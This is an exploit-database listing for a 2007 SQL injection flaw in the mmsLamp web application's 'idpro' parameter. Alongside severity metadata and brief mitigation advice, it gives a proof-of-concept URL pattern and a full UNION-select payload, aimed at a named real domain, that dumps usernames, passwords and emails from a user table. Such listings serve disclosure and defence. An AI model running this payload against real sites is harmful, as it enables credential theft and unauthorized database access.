header-logo
Suggest Exploit
vendor:
mmsLamp
by:
x0kster
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: mmsLamp
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

mmsLamp SQL Injection Vulnerability

The mmsLamp application is vulnerable to SQL injection. An attacker can manipulate the 'idpro' parameter in the 'default.php' script to execute arbitrary SQL queries. This can lead to unauthorized access, data leakage, or even remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries in the application code. Additionally, the application should be kept up-to-date with security patches and regular security audits should be conducted.
Source

Exploit-DB raw data:

Name            :  mmsLamp SQL Injection Vulnerability.
Author          :  x0kster
Email           :  x0kster@gmail.com
Script Page     :  http://www.brand039.com/?service=prodotti_dettaglio&idpro=4
Date            :  22/12/2007
Bug in          :  default.php
PoC             :  http://site.com/default.php?service=prodotti_dettaglio&idpro=[SQL]

Example: 

http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/*

# milw0rm.com [2007-12-23]

Navigation

Suggest Exploit

Services By CQR